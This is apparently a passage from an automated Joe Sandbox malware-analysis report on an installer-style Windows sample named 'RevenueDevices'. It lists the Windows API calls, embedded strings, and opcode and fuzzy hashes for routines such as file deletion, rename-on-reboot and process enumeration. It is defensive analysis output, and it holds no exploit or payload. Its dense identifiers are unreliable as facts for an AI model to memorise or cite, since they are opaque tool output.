                                        • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                        APIs
                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                        • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                        • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                        • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                        • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                        • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                        • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                        APIs
                                        • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                        • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                        • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                        • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                        • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                        • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                        • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08
                                        APIs
                                        • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                        • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                        • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                        • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                        • DeleteObject.GDI32(?), ref: 00404A79
                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                        • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                        • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                        • GlobalFree.KERNEL32(?), ref: 00404DAC
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                        • ShowWindow.USER32(?,00000000), ref: 00404F49
                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                        • ShowWindow.USER32(00000000), ref: 00404F5B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                        • String ID: $ @$M$N
                                        • API String ID: 1638840714-3479655940
                                        • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                        • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                        • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                        • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                        • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                        • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                        • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                        • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                        • CloseHandle.KERNEL32(?), ref: 004071E6
                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                        • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                        • API String ID: 1916479912-1189179171
                                        • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                        • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                        • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                        • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                        APIs
                                        • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                        • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                        • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                        • lstrlenW.KERNEL32(?), ref: 00406D2C
                                        • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                        • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                        • FindClose.KERNEL32(?), ref: 00406E33
                                        Strings
                                        • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                        • \*.*, xrefs: 00406D03
                                        • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                        • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                        • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                        • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                        • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                        • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                        • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                        • API String ID: 2035342205-3294556389
                                        • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                        • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                        • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                        • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                        • lstrlenW.KERNEL32(?), ref: 004063CC
                                        • GetVersionExW.KERNEL32(?), ref: 0040642A
                                          • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                        • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                        • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                        • GlobalFree.KERNEL32(?), ref: 004064DD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                        • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                        • API String ID: 20674999-2124804629
                                        • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                        • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                        • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                        • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                        APIs
                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                        • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                        • GetSysColor.USER32(?), ref: 004041AF
                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                        • lstrlenW.KERNEL32(?), ref: 004041D6
                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                          • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                          • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                          • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                        • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                        • SendMessageW.USER32(00000000), ref: 00404251
                                        • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                        • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                        • SetCursor.USER32(00000000), ref: 004042D2
                                        • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                        • SetCursor.USER32(00000000), ref: 004042F6
                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                        • String ID: @%F$N$open
                                        • API String ID: 3928313111-3849437375
                                        • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                        • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                        • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                        • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                        APIs
                                        • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                        • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                        • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                        • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                        • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                        • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                        • SetWindowTextW.USER32(?,?), ref: 00404583
                                        • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                        • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                        • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                        • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                          • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                          • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                          • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                          • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                          • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                          • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                        • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                        • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                        • String ID: 82D$@%F$@rD$A
                                        • API String ID: 3347642858-1086125096
                                        • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                        • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                        • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                        • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                        APIs
                                        • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                        • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                        • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                          • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                          • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                        • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                        • wsprintfA.USER32 ref: 00406B4D
                                        • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                          • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                          • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                        • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                        • CloseHandle.KERNEL32(?), ref: 00406C5C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                        • String ID: F$%s=%s$NUL$[Rename]
                                        • API String ID: 565278875-1653569448
                                        • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                        • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                        • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                        • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                        APIs
